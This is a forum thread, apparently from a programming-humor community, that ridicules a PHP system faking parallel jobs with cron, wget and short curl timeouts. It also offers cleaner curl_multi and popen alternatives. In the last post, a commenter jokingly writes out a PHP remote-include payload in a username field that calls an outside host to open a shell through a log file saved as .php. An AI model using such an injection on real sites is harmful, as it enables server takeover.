Parallel computing with Cron and PHP
-
I'm not sure I ever told you about how a certain system, let's call it AIRHEAD, does its calculations. Count the WTFs.
1. Customer sends sample data to a DB server on an hourly basis (not a WTF except that they occasionally delay or drop samples)
2. At a set time, carefully timed to just after the customer is expected to have sent their samples, a crontab entry on the airhead.io system runs wget [...] https://airhead.io/process/all.php to trigger processing.
3. all.php runs in a loop doing essentially this (pseudocode, I spare you the PHP):
    for category in sample_categories do
        curl("https://airhead.io/process/process.php?category=" + category)
4. process.php does calculations and writes the result to files.
5. all.php runs a calculation to combine the files into a summary file.
Now that would all be quite unreasonable to begin with, but step three is vastly more fragile and complicated for reasons I'm now getting to:
- curl_exec() is synchronous by default, so the processing was done in series, which is too slow, and all.php times out.
- A genius realized that you can set a short timeout CURLOPT_TIMEOUT, which means the CURL call will return before the HTTP call completes, effectively parallelizing the process. This works because the webserver is configured not to abort PHP when a request is canceled.
- Now because all.php does not wait for a response code, it doesn't know whether the jobs completed. So the jobs write their status to a DB.
- all.php then waits in a sleepy loop for all jobs to clear, polling the DB.
- Then all.php schedules the summing step.
- Because sometimes samples are delayed, the cronjob is duplicated 5 minutes later so it re-runs all.php, which must check with the DB whether the jobs need running.
- Monitoring of this machinery is implemented by having the jobs log profusely to a logfile. If the log goes over a threshold size we get alerted. The logfile is rotated every day, so the alert is cleared every day because the failures are rotated away.
Now you'd think people should realize their path to hell when things are not going well. But no, they double down. You see, sometimes the airhead.io webserver (where all this runs) would delay answering a request, which means CURL aborts the connection before the job starts. How can we detect this situation? Genius knows how: set the connection timeout slightly lower than the total curl timeout, then detect connection failures by the fact that CURL was not waiting for a transfer! So that's how this pull request was sent my way. Again, details omitted, the real code is ten times as long due to various hacks I'll ignore here. This is how a job is started:

    ...
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT_MS, 95);
    curl_setopt($curl, CURLOPT_TIMEOUT_MS, 100);
    curl_exec($curl);
    $errno = curl_errno($curl);
    $getInfo = curl_getinfo($curl);
    if( $errno == CURLE_OPERATION_TIMEDOUT ) {
        $pretransferTime = $getInfo["pretransfer_time"];
        if( $pretransferTime == 0 ) {
            log('error', 'connection failure');
        } else {
            log('success', 'job started');
        }
    } else {
        // more error handling
        ...
    }
So essentially, an HTTP request is sent and aborted after 100ms, by which time it should have started processing. But if CURL was still stuck trying to connect after 95ms, it will have aborted without having waited for data (pretransfer_time === 0), which allows us to detect connection timeouts where the job was likely not started.

Overcoming the onslaught of WTF while piecing together the functionality, I consolidated my swearing to these recommendations:
1. Start PHP processes from cron with /usr/bin/php rather than going through the webserver with wget
2. Start PHP background processes with popen() (edited: originally shell_exec(); and yes, it's available) instead of going through the webserver with curl
3. Use curl_multi_*() for async processing if option 2. is too big a change.
The answer: "Oh that would be too much work and it works as it is. Also you can't do things in parallel in a PHP process so option 3 can't work."
The guy then spent more than a day tweaking the timeouts to bring the flakiness of the system below an "acceptable" threshold. And we're still living with that broken parallelization scheme a year later. I was just too much of a softie in code reviews. But experiences like this one steel my resolve.
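
For reference, the curl_multi_*() recommendation could look roughly like the sketch below. It is not the code from the pull request: fetch_all(), its parameters and the default timeout are hypothetical names and values chosen for illustration. The idea is that one PHP process adds every request to a multi handle, drives all transfers concurrently, and only returns once each of them has finished, so the HTTP status of every job is known without polling a DB.

```php
<?php
// Sketch only: fetch_all() and its parameters are hypothetical names.
// Runs all requests concurrently and returns the HTTP status code per key
// (0 means no HTTP response was received for that request).
function fetch_all(array $urls, int $timeoutSeconds = 300): array
{
    $multi = curl_multi_init();
    $handles = [];
    foreach ($urls as $key => $url) {
        $handle = curl_init($url);
        curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($handle, CURLOPT_TIMEOUT, $timeoutSeconds);
        curl_multi_add_handle($multi, $handle);
        $handles[$key] = $handle;
    }

    // Drive every transfer until none is still running.
    $stillRunning = 0;
    do {
        $status = curl_multi_exec($multi, $stillRunning);
        if ($status === CURLM_OK && $stillRunning > 0) {
            // Sleep until any connection has activity (at most one second).
            curl_multi_select($multi, 1.0);
        }
    } while ($status === CURLM_OK && $stillRunning > 0);

    $httpCodes = [];
    foreach ($handles as $key => $handle) {
        $httpCodes[$key] = curl_getinfo($handle, CURLINFO_HTTP_CODE);
        curl_multi_remove_handle($multi, $handle);
    }
    return $httpCodes;
}
```

Called with one process.php URL per category, this returns only after all jobs have answered, which would make both the 100ms timeout trick and the sleepy DB polling loop unnecessary.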
-
@gleemonk shell_exec() is synchronous. There are several asynchronous alternatives; I think I ended up using popen().
-
I thought airhead.io was real.
-
It could be. That wouldn't be the most ridiculous thing we've seen, by far.
-
@_P_ said in Parallel computing with Cron and PHP:
I thought airhead.io was real.
It kinda is. And just from their frontpage, I'm nearly certain they belong in this category.
-
See?
-
@gleemonk ... you know a wtf is going to be damn good when just reading the title makes you actually laugh out loud
-
Just seeing all.php makes my blood curdle.
-
@gleemonk said in Parallel computing with Cron and PHP:
A genius
That must be one of those 10x engineers we heard about yesterday.
-
@PleegWat said in Parallel computing with Cron and PHP:
popen()
Thanks! I wasn't sure what I recommended a year ago so I took the first thing that could possibly work. While it does "work", shell_exec() would be really ugly because you'd have to background the process with &.
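
A minimal sketch of the popen() variant, assuming each job is a standalone CLI script that takes the category as its first argument. run_workers() and that calling convention are hypothetical, not taken from the AIRHEAD code. popen() returns as soon as the child process is started, so the first loop launches all workers before the second loop waits for any of them.

```php
<?php
// Sketch only: run_workers() and the "script + category argument" calling
// convention are assumptions made for illustration.
function run_workers(string $script, array $categories): array
{
    $pipes = [];
    foreach ($categories as $category) {
        $command = escapeshellarg(PHP_BINARY) . ' '
            . escapeshellarg($script) . ' '
            . escapeshellarg((string) $category);
        // popen() starts the process and returns without waiting for it.
        $pipe = popen($command, 'r');
        if ($pipe === false) {
            throw new RuntimeException("could not start worker for $category");
        }
        $pipes[$category] = $pipe;
    }

    $exitCodes = [];
    foreach ($pipes as $category => $pipe) {
        // Drain the worker's output so it cannot block on a full pipe.
        stream_get_contents($pipe);
        // pclose() waits for the process and reports its termination status.
        $exitCodes[$category] = pclose($pipe);
    }
    return $exitCodes;
}
```

The output is drained one worker at a time, so a very chatty worker may stall until its turn comes; for jobs that write their results to files that should not matter much.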
-
@gleemonk said in Parallel computing with Cron and PHP:
3. Use curl_multi_*() for async processing if option 2. is too big a change.
The answer: "Oh that would be too much work and it works as it is. Also you can't do things in parallel in a PHP process so option 3 can't work."
I've seen way too much code and spoken to way too many engineers that doesn't/who don't understand select()-like APIs. It's like I/O multiplexing is completely incomprehensible to them, because how can you have a single thread of code monitoring multiple things at the same time? Surely you'd need a separate thread for each thing, right?

My current employer's code takes this to the extreme by spawning a new thread every mouse click or similarly basic UI operation, because reasons. Of course, changing it "would be too much work and it works as it is".
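
To make the select() point concrete in PHP terms, here is a small sketch of a single thread watching several streams at once with stream_select(). wait_for_all() is a hypothetical helper, and the assumption is that every stream eventually delivers one newline-terminated line.

```php
<?php
// Sketch only: wait_for_all() is a hypothetical helper. It assumes each
// stream eventually delivers exactly one newline-terminated line.
function wait_for_all(array $streams, float $timeoutSeconds = 5.0): array
{
    $received = [];
    $pending = $streams;
    $deadline = microtime(true) + $timeoutSeconds;

    while ($pending && microtime(true) < $deadline) {
        $read = array_values($pending);
        $write = null;
        $except = null;
        // One call sleeps until ANY of the pending streams becomes readable.
        if (stream_select($read, $write, $except, 1) === false) {
            break;
        }
        foreach ($read as $ready) {
            $name = array_search($ready, $pending, true);
            $received[$name] = fgets($ready);
            unset($pending[$name]);
        }
    }
    return $received;
}
```

No extra threads are involved: the kernel reports which streams are ready, and the loop handles them in whatever order they complete.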
-
@strangeways said in Parallel computing with Cron and PHP:
spawning a new thread every mouse click or similarly basic UI operation
Which means mouse-clicks can be applied out-of-order
-
@gleemonk
There are only two hard things in programming:
- Naming things
...I’ll come in again
- Race conditions
- Off-by-one errors
-
@izzion Yes indeed cache-invalidation is the worst problem.
-
@izzion said in Parallel computing with Cron and PHP:
@gleemonk
There are only two hard things in programming:
- Naming things
...I’ll come in again
- Race conditions
- Off-by-one errors
And scope creep.
-
@dkf scope creep isn't a hard problem. It's unsolvable solely for political reasons.
-
The Mythical Man-Month had some insight as to why my pet projects always balloon out of control on scope.
It says that the scope is defined by budgetary constraints of time and money. Since I never had a budget for my projects, their scope grew unboundedly.
-
That's the problem with uninitialized variables.
-
@Zerosquare said in Parallel computing with Cron and PHP:
That's the problem with uninitialized variables.
It could be worse.
-
@gleemonk said in Parallel computing with Cron and PHP:
all.php
runs in a loop doing essentially this (pseudocode, I spare you the PHP):for category in sample_categories do curl("https://airhead.io/process/process.php?category=" + category)
fork()
As A Service!
-
@error said in Parallel computing with Cron and PHP:
It could be worse.
I sincerely hope nobody uses PHP to manage something that generates high-energy radiation.
-
@Zerosquare said in Parallel computing with Cron and PHP:
I sincerely hope nobody uses PHP to manage something that generates high-energy radiation.
If you're really honest, you know that someone is probably using it for that purpose, and that thought will forever haunt you in your worst dreams.
-
Shhhhh. I already worry at night about the possibility that my work could be the cause of a major issue. I don't need more anxiety, thank you.
-
@dfdub said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
I sincerely hope nobody uses PHP to manage something that generates high-energy radiation.
If you're really honest, you know that someone is probably using it for that purpose, and that thought will forever haunt you in your worst dreams.
Like the LHC? Not that I have any knowledge yea or nay, but that’s a possibility :shudders:
-
@M_Adams said in Parallel computing with Cron and PHP:
@dfdub said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
I sincerely hope nobody uses PHP to manage something that generates high-energy radiation.
If you're really honest, you know that someone is probably using it for that purpose, and that thought will forever haunt you in your worst dreams.
Like the LHC? Not that I have any knowledge yea or nay, but that’s a possibility :shudders:
Worse, they're probably using C++.
-
@_P_: duh. To accelerate particles, you need a fast language!
-
@Zerosquare said in Parallel computing with Cron and PHP:
@_P_: duh. To accelerate particles, you need a fast language!
Last time I checked C++ does not take into account the effect of relativity. Or quantum mechanics.
-
@_P_ said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
@_P_: duh. To accelerate particles, you need a fast language!
Last time I checked C++ does not take into account the effect of relativity. Or quantum mechanics.
Clearly you need a 4 dimensional operating system for that.
-
@_P_ said in Parallel computing with Cron and PHP:
Last time I checked C++ does not take into account the effect of relativity. Or quantum mechanics.
Are you sure? I wouldn't be surprised if it was a documented cause of undefined behavior.
-
@Zerosquare Radiation-induced bit-flips can indeed cause undefined behaviour. Most people don't have to care about this.
-
@_P_ said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
@_P_: duh. To accelerate particles, you need a fast language!
Last time I checked C++ does not take into account the effect of relativity. Or quantum mechanics.
But it does allow time travel!
-
@Zerosquare said in Parallel computing with Cron and PHP:
I already worry at night about the possibility that my work could be the cause of a major issue.
I hear ya... Working in an FDA regulated industry is … different.
-
@_P_ why, of course it does (at least for relativity): https://root.cern/doc/master/classROOT_1_1Math_1_1LorentzVector.html
-
@dcon said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
I already worry at night about the possibility that my work could be the cause of a major issue.
I hear ya... Working in an FDA regulated industry is … different.
IME it is only different by all the WTFs being harder to fix, because the product is already through formal testing.
Granted, the mere existence of formal testing does make it somewhat better than some other industries, but not by much. The formal tests are black-box, so sufficiently rare race conditions and similar intermittent issues fly right through:
- If the tests are automated, their timing is fairly predictable. And in the cases I've seen, fairly slow, because spawning adb input takes some time and moving the mechanical finger to the right spot above the iPad even more so.
- If the tests are manual, occasional failure is put down to the tester clicking wrong.
- Even automated tests are retried when they fail, and if they manage to succeed eventually, the failure is written down as a problem of the test rig, because the test rigs and libraries are flaky.
-
@Zerosquare said in Parallel computing with Cron and PHP:
@error said in Parallel computing with Cron and PHP:
It could be worse.
I sincerely hope nobody uses PHP to manage something that generates high-energy radiation.
disable_deadly_radiation_real2()
-
@dargor17 Welcome back!
-
Wow this codebase provides! I'm doing some more work on it and as part of that I checked the log-file log-2019-08-16.php. Here's the first line in this file:

    <?php defined('BASEPATH') OR exit('No direct script access allowed'); ?>

Yes it's true, the logfile has a .php extension.
-
What really worries me about this is the OR. It looks like the original programmer thought there were legitimate reasons why one would want to run a logfile through the PHP parser.
-
@_P_ said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
@_P_: duh. To accelerate particles, you need a fast language!
Last time I checked C++ does not take into account the effect of relativity. Or quantum mechanics.
So what you're saying is, they're using Q#?
-
@gleemonk said in Parallel computing with Cron and PHP:
What really worries me about this is the OR. It looks like the original programmer thought there were legitimate reasons why one would want to run a logfile through the PHP parser.
Of course there is. Including it in that admyn.php page cleverly secured by the unguessable name and there being no public links to it (at least I hope so).
-
@Bulb said in Parallel computing with Cron and PHP:
Of course there is. Including it in that admyn.php page cleverly secured by the unguessable name and there being no public links to it (at least I hope so).
Hey, how did you know our production setup? Well, I'm not worried because you don't know our domain, so it's all perfectly secure. Anyway, that script also enables a clever way of logging in when you misplaced the note with the password: because user input is logged to the logfile, you can fill out the form with this username

    Bobby <?php include("http://shells.for.everyone/php"); ?>

and then visit admyn.php to trigger the shell.

Seriously though, I haven't found a place where logfiles are PHP-included. Maybe that part was removed.